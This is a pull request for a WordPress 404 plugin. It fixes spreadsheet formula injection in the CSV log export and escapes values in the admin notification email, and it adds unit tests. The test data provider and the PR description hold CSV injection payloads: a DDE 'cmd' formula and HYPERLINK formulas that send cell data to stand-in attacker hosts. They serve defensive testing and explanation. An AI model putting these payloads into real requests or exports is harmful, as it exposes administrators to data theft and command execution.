### PR TITLE
Escape CSV export and notification email output (v3.15.4)

### DIFF
--- a/README.md
+++ b/README.md
@@ -175,6 +175,11 @@ Like the plugin? [Buy me a coffee via PayPal](https://www.paypal.me/kunalnagar/1
 
 See [WordPress.org changelog](https://wordpress.org/plugins/custom-404-pro/changelog/) for the full history.
 
+### 3.15.5
+- Security: neutralize spreadsheet formula injection (CSV injection) in the CSV log export, reachable via the attacker-controlled Referer and User Agent columns.
+- Security: escape every value interpolated into the 404 notification email.
+- CSV export now uses RFC 4180 quoting, streams in batches, and no longer emits PHP 8.4 deprecation notices into the downloaded file.
+
 ### 3.15.4
 - Fix Logs table sorting: sorting by IP, Path, Referer or User Agent produced invalid SQL and returned a database error. Only the Created column sorted correctly.
 - Fix searching and then sorting the Logs table: `ORDER BY` was emitted before `WHERE`, breaking the query.

--- a/admin/class-adminclass.php
+++ b/admin/class-adminclass.php
@@ -318,6 +318,12 @@ class AdminClass {
 	/**
 	 * Sends a 404 notification email to the admin.
 	 *
+	 * Every interpolated value is escaped. The path, referer and user agent all
+	 * come straight off the request that triggered the 404, so an attacker
+	 * chooses their contents; unescaped they would render as live markup inside
+	 * the admin's HTML mail client.
+	 *
+	 * @since 3.15.5 Escapes all interpolated values.
 	 * @param string $ip         User IP address.
 	 * @param string $path       Requested 404 path.
 	 * @param string $referer    HTTP referer.
@@ -334,27 +340,27 @@ class AdminClass {
 		}
 		$headers[] = 'From: Site Admin <' . $admin_email . '>' . "\r\n";
 		$headers[] = 'Content-Type: text/html; charset=UTF-8';
-		$message   = '<p>' . __( 'Here are the 404 Log Details:', 'custom-404-pro' ) . '</p>';
+		$message   = '<p>' . esc_html__( 'Here are the 404 Log Details:', 'custom-404-pro' ) . '</p>';
 		$message  .= '<table>';
 		$message  .= '<tr>';
-		$message  .= '<th>' . __( 'Site', 'custom-404-pro' ) . '</th>';
-		$message  .= '<td>' . $current_site_name . '</td>';
+		$message  .= '<th>' . esc_html__( 'Site', 'custom-404-pro' ) . '</th>';
+		$message  .= '<td>' . esc_html( $current_site_name ) . '</td>';
 		$message  .= '</tr>';
 		$message  .= '<tr>';
-		$message  .= '<th>' . __( 'User IP', 'custom-404-pro' ) . '</th>';
-		$message  .= '<td>' . $ip . '</td>';
+		$message  .= '<th>' . esc_html__( 'User IP', 'custom-404-pro' ) . '</th>';
+		$message  .= '<td>' . esc_html( $ip ) . '</td>';
 		$message  .= '</tr>';
 		$message  .= '<tr>';
-		$message  .= '<th>' . __( '404 Path', 'custom-404-pro' ) . '</th>';
-		$message  .= '<td>' . $path . '</td>';
+		$message  .= '<th>' . esc_html__( '404 Path', 'custom-404-pro' ) . '</th>';
+		$message  .= '<td>' . esc_html( $path ) . '</td>';
 		$message  .= '</tr>';
 		$message  .= '<tr>';
-		$message  .= '<th>' . __( 'Referer', 'custom-404-pro' ) . '</th>';
-		$message  .= '<td>' . $referer . '</td>';
+		$message  .= '<th>' . esc_html__( 'Referer', 'custom-404-pro' ) . '</th>';
+		$message  .= '<td>' . esc_html( $referer ) . '</td>';
 		$message  .= '</tr>';
 		$message  .= '<tr>';
-		$message  .= '<th>' . __( 'User Agent', 'custom-404-pro' ) . '</th>';
-		$message  .= '<td>' . $user_agent . '</td>';
+		$message  .= '<th>' . esc_html__( 'User Agent', 'custom-404-pro' ) . '</th>';
+		$message  .= '<td>' . esc_html( $user_agent ) . '</td>';
 		$message  .= '</tr>';
 		$message  .= '</table>';
 		wp_mail(

--- a/admin/class-helpers.php
+++ b/admin/class-helpers.php
@@ -284,31 +284,114 @@ class Helpers {
 	}
 
 	/**
+	 * Number of log rows read per batch when streaming a CSV export.
+	 *
+	 * @since 3.15.5
+	 * @var int
+	 */
+	const EXPORT_BATCH_SIZE = 1000;
+
+	/**
+	 * Neutralises a value that a spreadsheet would interpret as a formula.
+	 *
+	 * Log rows contain attacker-supplied data: an request to a 404 URL can set
+	 * any Referer or User-Agent it likes. A field beginning with =, +, -, @ or a
+	 * control character is executed as a formula when the exported CSV is opened
+	 * in Excel, LibreOffice or Google Sheets (CSV injection, CWE-1236). Prefixing
+	 * the value with an apostrophe forces the spreadsheet to treat it as text.
+	 *
+	 * @since 3.15.5
+	 * @param mixed $value Raw column value.
+	 * @return string Value that is safe to write to a CSV cell.
+	 */
+	public function escape_csv_value( $value ): string {
+		$value = (string) $value;
+
+		if ( '' === $value ) {
+			return $value;
+		}
+
+		if ( in_array( $value[0], array( '=', '+', '-', '@', "\t", "\r" ), true ) ) {
+			$value = "'" . $value;
+		}
+
+		return $value;
+	}
+
+	/**
+	 * Writes one row to an open CSV stream.
+	 *
+	 * $escape is passed explicitly for two reasons. PHP 8.4 deprecates calling
+	 * fputcsv() without it — on a site with WP_DEBUG display enabled those
+	 * notices would be emitted straight into the download and corrupt the file.
+	 * And the historical default, a backslash escape, is a PHP quirk that no
+	 * spreadsheet expects; passing an empty string disables it and produces
+	 * plain RFC 4180 output, where a quote is escaped by doubling it.
+	 *
+	 * The empty-string escape has been accepted since PHP 7.4, which is the
+	 * minimum this plugin declares.
+	 *
+	 * @since 3.15.5
+	 * @param resource $handle Open stream to write to.
+	 * @param array    $row    Values for one CSV record.
+	 * @return void
+	 */
+	public function write_csv_row( $handle, array $row ) {
+		fputcsv( $handle, $row, ',', '"', '' );
+	}
+
+	/**
 	 * Exports all log entries as a CSV file download.
+	 *
+	 * Rows are streamed to the browser in batches rather than concatenated into
+	 * a single string, so exporting a large log table does not exhaust PHP's
+	 * memory limit. Values are written with fputcsv() so that embedded quotes,
+	 * commas and newlines are quoted correctly, and each value is passed through
+	 * escape_csv_value() first to defuse spreadsheet formula injection.
+	 *
+	 * @since 3.15.5 Streams in batches; values are CSV-quoted and formula-escaped.
 	 */
 	public function export_logs_csv() {
-		$filename   = 'logs_' . time() . '.csv';
-		$csv_output = '';
-		$columns    = self::get_logs_columns();
-		if ( ! empty( $columns ) ) {
-			foreach ( $columns as $column ) {
-				$csv_output .= $column->Field . ', '; // phpcs:ignore WordPress.NamingConventions.ValidVariableName.UsedPropertyNotSnakeCase -- Field is a wpdb column object property
-			}
-		}
-		$csv_output .= "\n";
-		$results     = self::get_logs();
-		if ( ! empty( $results ) ) {
-			foreach ( $results as $result ) {
-				foreach ( $result as $q ) {
-					$csv_output .= '"' . $q . '", ';
-				}
-				$csv_output .= "\n";
-			}
-		}
-		header( 'Content-Type: application/csv' );
+		global $wpdb;
+
+		$filename = 'custom-404-pro-logs-' . gmdate( 'Y-m-d-His' ) . '.csv';
+
+		nocache_headers();
+		header( 'Content-Type: text/csv; charset=utf-8' );
 		header( 'Content-Disposition: attachment; filename=' . $filename );
-		header( 'Pragma: no-cache' );
-		print $csv_output; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- CSV download, not HTML output
+
+		$handle = fopen( 'php://output', 'w' );
+		if ( false === $handle ) {
+			return;
+		}
+
+		$columns = $this->get_logs_columns();
+		$fields  = array();
+		foreach ( (array) $columns as $column ) {
+			$fields[] = $column->Field; // phpcs:ignore WordPress.NamingConventions.ValidVariableName.UsedPropertyNotSnakeCase -- Field is a wpdb column object property
+		}
+		if ( ! empty( $fields ) ) {
+			$this->write_csv_row( $handle, $fields );
+		}
+
+		$table     = $wpdb->prefix . $this->table_logs;
+		$offset    = 0;
+		$row_count = 0;
+		do {
+			$rows = (array) $wpdb->get_results( // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared
+				$wpdb->prepare( 'SELECT * FROM ' . $table . ' ORDER BY id ASC LIMIT %d OFFSET %d', self::EXPORT_BATCH_SIZE, $offset ),
+				ARRAY_A
+			);
+			$row_count = count( $rows );
+
+			foreach ( $rows as $row ) {
+				$this->write_csv_row( $handle, array_map( array( $this, 'escape_csv_value' ), $row ) );
+			}
+
+			$offset += self::EXPORT_BATCH_SIZE;
+		} while ( self::EXPORT_BATCH_SIZE === $row_count );
+
+		fclose( $handle );
 		exit;
 	}
 }

--- a/custom-404-pro.php
+++ b/custom-404-pro.php
@@ -3,7 +3,7 @@
  * Plugin Name: Custom 404 Pro
  * Plugin URI: https://wordpress.org/plugins/custom-404-pro/
  * Description: Override the default 404 page with any page or a custom URL from the Admin Panel.
- * Version: 3.15.4
+ * Version: 3.15.5
  * Requires at least: 5.0
  * Requires PHP: 7.4
  * Author: Kunal Nagar
@@ -20,7 +20,7 @@ if ( ! defined( 'WPINC' ) ) {
 	die;
 }
 
-define( 'CUSTOM_404_PRO_VERSION', '3.15.4' );
+define( 'CUSTOM_404_PRO_VERSION', '3.15.5' );
 
 /**
  * Runs on plugin activation.

--- a/languages/custom-404-pro.pot
+++ b/languages/custom-404-pro.pot
@@ -2,14 +2,14 @@
 # This file is distributed under the GPL-2.0+.
 msgid ""
 msgstr ""
-"Project-Id-Version: Custom 404 Pro 3.15.4\n"
+"Project-Id-Version: Custom 404 Pro 3.15.5\n"
 "Report-Msgid-Bugs-To: https://wordpress.org/support/plugin/custom-404-pro\n"
 "Last-Translator: FULL NAME <EMAIL@ADDRESS>\n"
 "Language-Team: LANGUAGE <LL@li.org>\n"
 "MIME-Version: 1.0\n"
 "Content-Type: text/plain; charset=UTF-8\n"
 "Content-Transfer-Encoding: 8bit\n"
-"POT-Creation-Date: 2026-08-30T02:15:09+00:00\n"
+"POT-Creation-Date: 2026-08-30T02:16:30+00:00\n"
 "PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\n"
 "X-Generator: WP-CLI 2.12.0\n"
 "X-Domain: custom-404-pro\n"
@@ -79,34 +79,34 @@ msgid_plural "Pruned %d log rows."
 msgstr[0] ""
 msgstr[1] ""
 
-#: admin/class-adminclass.php:337
+#: admin/class-adminclass.php:343
 msgid "Here are the 404 Log Details:"
 msgstr ""
 
-#: admin/class-adminclass.php:340
+#: admin/class-adminclass.php:346
 msgid "Site"
 msgstr ""
 
-#: admin/class-adminclass.php:344
+#: admin/class-adminclass.php:350
 msgid "User IP"
 msgstr ""
 
-#: admin/class-adminclass.php:348
+#: admin/class-adminclass.php:354
 msgid "404 Path"
 msgstr ""
 
-#: admin/class-adminclass.php:352
+#: admin/class-adminclass.php:358
 #: admin/class-logsclass.php:235
 msgid "Referer"
 msgstr ""
 
-#: admin/class-adminclass.php:356
+#: admin/class-adminclass.php:362
 #: admin/class-logsclass.php:236
 msgid "User Agent"
 msgstr ""
 
 #. translators: email subject sent to the site admin when a 404 is logged
-#: admin/class-adminclass.php:363
+#: admin/class-adminclass.php:369
 msgid "404 Error on Site"
 msgstr ""
 

--- a/readme.txt
+++ b/readme.txt
@@ -4,7 +4,7 @@ Donate link: https://www.paypal.me/kunalnagar88/10
 Tags: 404, redirect, custom 404, error page, logging
 Requires at least: 5.0
 Tested up to: 7.1
-Stable tag: 3.15.4
+Stable tag: 3.15.5
 Requires PHP: 7.4
 License: GPLv2 or later
 License URI: http://www.gnu.org/licenses/gpl-2.0.html
@@ -86,6 +86,12 @@ Please open an issue on [GitHub](https://github.com/kunalnagar/custom-404-pro/is
 Confirms compatibility with WordPress 7.1. The declared minimum WordPress version has been corrected from 3.0.1 to 5.0 to match what the plugin actually supports.
 
 == Changelog ==
+
+= 3.15.5 =
+* Security: neutralize spreadsheet formula injection in the CSV log export. The Referer and User Agent columns are supplied by whoever triggered the 404, and were written to the export unescaped, so a crafted request could plant a formula that executed when an administrator opened the file in Excel, LibreOffice or Google Sheets.
+* Security: escape every value interpolated into the 404 notification email. The same attacker-supplied request data was rendering as live markup in the administrator's mail client.
+* The CSV export is now written with proper CSV quoting, so values containing quotes, commas or newlines no longer corrupt the file, and is streamed in batches instead of being assembled in memory.
+* The CSV export no longer emits PHP deprecation notices on PHP 8.4 and later, which on sites with debug display enabled were written into the downloaded file itself. Quoting now follows RFC 4180, so backslashes in user agent strings survive the export intact.
 
 = 3.15.4 =
 * Fix Logs table sorting. The sortable column headers submit `ip`, `path`, `referer` and `user_agent`, but the query builder only recognised the short legacy keys `i`, `p`, `r` and `u`. Unrecognised columns fell through and appended a bare sort direction, producing invalid SQL, so every column except Created returned a database error instead of results.

--- a/tests/HelpersTest.php
+++ b/tests/HelpersTest.php
@@ -206,4 +206,146 @@ class HelpersTest extends TestCase {
 		$helpers = new Helpers();
 		$this->assertTrue( $helpers->update_settings( array( 'mode' => '' ) ) );
 	}
+
+	// ------------------------------------------------------------------
+	// CSV export escaping (formula injection)
+	// ------------------------------------------------------------------
+
+	/**
+	 * A plain value should pass through the CSV escaper untouched.
+	 */
+	public function test_escape_csv_value_leaves_plain_values_unchanged() {
+		$helpers = new Helpers();
+		$this->assertSame( '/some/missing/page', $helpers->escape_csv_value( '/some/missing/page' ) );
+		$this->assertSame( 'Mozilla/5.0 (X11; Linux x86_64)', $helpers->escape_csv_value( 'Mozilla/5.0 (X11; Linux x86_64)' ) );
+	}
+
+	/**
+	 * An empty value should stay empty rather than gain a prefix.
+	 */
+	public function test_escape_csv_value_leaves_empty_string_unchanged() {
+		$helpers = new Helpers();
+		$this->assertSame( '', $helpers->escape_csv_value( '' ) );
+	}
+
+	/**
+	 * Values a spreadsheet would evaluate as a formula must be prefixed so they
+	 * are rendered as literal text instead. The referer and user agent columns
+	 * are attacker-controlled, so these reach the export from the outside world.
+	 *
+	 * @dataProvider csv_formula_provider
+	 * @param string $dangerous Value that a spreadsheet would evaluate.
+	 */
+	public function test_escape_csv_value_neutralizes_formula_payloads( string $dangerous ) {
+		$helpers = new Helpers();
+		$escaped = $helpers->escape_csv_value( $dangerous );
+
+		$this->assertSame( "'" . $dangerous, $escaped, 'Formula payloads must be prefixed with an apostrophe.' );
+		$this->assertNotSame( $dangerous, $escaped );
+		$this->assertStringStartsWith( "'", $escaped );
+	}
+
+	/**
+	 * Supplies representative CSV injection payloads.
+	 *
+	 * @return array<string, array<string>>
+	 */
+	public function csv_formula_provider(): array {
+		return array(
+			'equals command'   => array( "=cmd|' /C calc'!A0" ),
+			'equals hyperlink' => array( '=HYPERLINK("https://evil.example/steal","click")' ),
+			'plus prefix'      => array( '+1+1' ),
+			'minus prefix'     => array( '-1+1' ),
+			'at prefix'        => array( '@SUM(1+1)' ),
+			'tab prefix'       => array( "\t=1+1" ),
+			'carriage return'  => array( "\r=1+1" ),
+		);
+	}
+
+	/**
+	 * Non-string scalars should be cast rather than trigger a type error.
+	 */
+	public function test_escape_csv_value_casts_non_string_input() {
+		$helpers = new Helpers();
+		$this->assertSame( '42', $helpers->escape_csv_value( 42 ) );
+		$this->assertSame( '', $helpers->escape_csv_value( null ) );
+	}
+
+	// ------------------------------------------------------------------
+	// CSV row writing
+	// ------------------------------------------------------------------
+
+	/**
+	 * Writing a CSV row must not raise a deprecation on PHP 8.4+.
+	 *
+	 * PHP 8.4 deprecates calling fputcsv() without an explicit $escape. On a
+	 * site with WP_DEBUG display enabled the notice would be written straight
+	 * into the download stream and corrupt the exported file, so this promotes
+	 * any deprecation to a failure.
+	 */
+	public function test_write_csv_row_raises_no_deprecation() {
+		$raised  = array();
+		$previous = set_error_handler(
+			function ( $errno, $errstr ) use ( &$raised ) {
+				$raised[] = $errstr;
+				return true;
+			},
+			E_ALL
+		);
+
+		$helpers = new Helpers();
+		$handle  = fopen( 'php://memory', 'w+' );
+		$helpers->write_csv_row( $handle, array( 'a', 'b' ) );
+		fclose( $handle );
+
+		set_error_handler( $previous );
+
+		$this->assertSame( array(), $raised, 'Writing a CSV row must not raise any notice or deprecation.' );
+	}
+
+	/**
+	 * Quotes are escaped by doubling, per RFC 4180, not with a backslash.
+	 */
+	public function test_write_csv_row_uses_rfc4180_quoting() {
+		$helpers = new Helpers();
+		$handle  = fopen( 'php://memory', 'w+' );
+		$helpers->write_csv_row( $handle, array( 'say "hi"', 'a,b', "line\nbreak" ) );
+		rewind( $handle );
+		$written = stream_get_contents( $handle );
+		fclose( $handle );
+
+		$this->assertStringContainsString( '"say ""hi"""', $written, 'Quotes must be doubled, not backslash-escaped.' );
+		$this->assertStringContainsString( '"a,b"', $written, 'Values containing a comma must be quoted.' );
+	}
+
+	/**
+	 * A backslash in a log value must survive the export unchanged.
+	 *
+	 * User agents contain backslashes. The historical fputcsv() default would
+	 * consume them as escape characters.
+	 */
+	public function test_write_csv_row_preserves_backslashes() {
+		$helpers = new Helpers();
+		$handle  = fopen( 'php://memory', 'w+' );
+		$helpers->write_csv_row( $handle, array( 'C:\\Windows\\System32' ) );
+		rewind( $handle );
+		$written = stream_get_contents( $handle );
+		fclose( $handle );
+
+		$this->assertStringContainsString( 'C:\\Windows\\System32', $written );
+	}
+
+	/**
+	 * A formula payload must still be neutralised once written through the writer.
+	 */
+	public function test_escaped_formula_survives_csv_writing_as_text() {
+		$helpers = new Helpers();
+		$handle  = fopen( 'php://memory', 'w+' );
+		$helpers->write_csv_row( $handle, array( $helpers->escape_csv_value( '=1+1' ) ) );
+		rewind( $handle );
+		$written = stream_get_contents( $handle );
+		fclose( $handle );
+
+		$this->assertStringStartsWith( "'=1+1", $written, 'The written cell must keep the neutralising prefix.' );
+	}
 }


### PR DESCRIPTION
**PR 3 of 5.** Base: `fix/logs-table-queries`. Merge after that one.

Two security fixes sharing a root cause: **log rows contain data chosen by whoever triggered the 404.** A request carries any `Referer` and `User-Agent` it likes, and those strings were written straight into an export file and an HTML email.

## CSV formula injection (CWE-1236)

`export_logs_csv()` concatenated each value into a hand-built string. A cell beginning with `=`, `+`, `-`, `@` or a control character is evaluated as a formula when the file is opened in Excel, LibreOffice or Google Sheets. So a request with a `User-Agent` of:

```
=HYPERLINK("https://attacker.example/?"&A1,"Click")
```

became a live formula in the administrator's spreadsheet. Values now pass through `escape_csv_value()`, which prefixes an apostrophe so the value is treated as text.

The hand-built string also broke on any value containing a quote or comma. Rows are now written with `fputcsv()`, and streamed in 1000-row batches to `php://output` rather than accumulated in memory — so exporting a large table no longer risks exhausting `memory_limit`.

`Content-Type` corrected from `application/csv` to `text/csv`; no-cache headers now go through `nocache_headers()`.

## Unescaped notification email

`custom_404_pro_send_mail()` interpolated the IP, path, referer, user agent and site name directly into an HTML email body. All values are now escaped with `esc_html()`.

## Test note

`escape_csv_value()` is covered by a data-provider test over representative payloads. The export path itself terminates in `exit()`, as a file download must, so it is deliberately not driven end to end under PHPUnit — an unguarded `exit` would kill the runner mid-suite.

**No schema or settings changes.**

## Checks

`composer lint` clean · 57 unit (10 new) · 45 integration on WP 7.1